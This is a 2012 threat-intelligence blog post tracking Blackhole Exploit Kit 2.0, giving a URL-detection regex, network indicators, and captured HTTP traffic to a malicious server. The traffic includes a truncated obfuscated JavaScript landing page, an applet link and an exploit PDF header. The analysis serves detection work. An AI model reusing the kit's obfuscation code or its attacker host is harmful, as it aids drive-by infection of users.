UPDATE: 10/15/2012
Due to the high number of FPs from facebook, the regex is now tighter.
In my continuation of URL patterns in exploit kits, it appears the one I am focused on right now is Blackhole Exploit Kit 2.0 and its URL structure follows a predictable pattern. The pattern I identified in this post appears to be BHEK 2.0. This is a running series where I am posting my intel as I go.
\.php\?\w{2,10}\=[0-9a-f]{10}\&\w{2,10}\=[a-z0-9]{2,6}\&[a-z]{2,8}\=[a-z]{2,10}\&[a-z]{2,8}\=[a-z]{2,8}$
While some of the patterns I have investigated contain greater than 10 hex in the first parameter (in 10 character increments), the majority of these have exactly 10. If you have observations that this is hitting false positives, please leave a comment below.
Some of the interesting patterns that I have discovered here are:
- The initial point of contact contains an applet archive
- The initial get request response has the following at offset 0 "<html><head><title></title></head><body><div dqa="asd">"
- The response contains try,catch,try,catch, but towards the end.
- The second and subsequent URLs (GET Requests) are a consistent match to the regex pattern above
- In all cases I have observed, the exploit sent was a PDF with 5 letters in the name (random name).
- The PDFs are served with "Content-Disposition: inline; filename="
- "/Index[5 1 7 1 9 4 23 4 50 " is a good layer 7 IOC in the response packets for the PDF exploit.
- I have observed two different sized PDFs, not sure of differences at this time.
Request:
GET /links/rules_familiar-occurred.php HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 173.246.101.197
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 14 Oct 2012 19:52:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.14-1~dotdeb.0
509
<html><head><title></title></head><body><div dqa="asd"></div><applet archive="http://173.246.101.197/links/rules_familiar-occurred.php?cjqj=0735020b0b&zwjw=4447&pdfvomu=jpjhbwls&snguplp=nvqz" code="vwqfqwfea"><param name="uid" value=' < REALLY LONG VALUE>
</u><script>
if(020==0x10)d=document;
try{fsdsb^32}catch(gdsgsd){try{(d+"523")()}catch(dsgdsg){a=d[g](ggg);}}
s="";
for(i=0;;i++){
.window.asd2();
.if(r){s=s+r;}else break;
}
a=s;
s="";
k="";
asd3();
qa=0x1d;
for(i=0;i<a.length;i+=2){
.s+=ss(p(a[sss](i,2),qa));
if(021==0x11)asd();
..</script></body></html>
0
Request:
GET /links/rules_familiar-occurred.php?bklx=0735020b0b&wgaxj=43&qrfjyn=33090b0b0304080b0336&chxyb=02000200020002 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Referer: http://173.246.101.197/links/rules_familiar-occurred.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 173.246.101.197
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 14 Oct 2012 19:52:47 GMT
Content-Type: application/pdf
Connection: keep-alive
Content-Length: 13388
X-Powered-By: PHP/5.3.14-1~dotdeb.0
Accept-Ranges: bytes
Content-Disposition: inline; filename=2a34b.pdf
%PDF-1.6
%....
52 0 obj<</Length 4321/Root 1 0 R/Info 3 0 R/Filter/FlateDecode/W[1 2 1]/Index[5 1 7 1 9 4 23 4 50 3]>>stream
x.bbb0b`b```.G0.....!...w.310Z...2....w...
References:
http://jsunpack.jeek.org/dec/go?report=77b050856d601de7dd7df086d4cf2c03d5043464
http://securityanalyst.co/blackhole-2-0-exploit-kit-pcap-download-wireshark-tcpdump-traffic-analysis/
http://fortknoxnetworks.blogspot.com/2012/10/url-patterns-emerging-in-new-threats.html
http://jsunpack.jeek.org/dec/go?report=43231d144a88024f6a4bdb6a890c7d51148cfae2
http://labs.vericon.li/2012/10/exploitjsblacole-gb-infection-explained-with-source-code/
http://jsunpack.jeek.org/?report=bcf3b47db058c9a6406ca55e1758d0c01790683b
http://pastebin.com/iCfC5kzY (Credit to @MALWAREMUSTDIE)
http://jsunpack.jeek.org/dec/go?report=8ec366564ae09ff7488554fffc03ad518fb5c591
No comments:
Post a Comment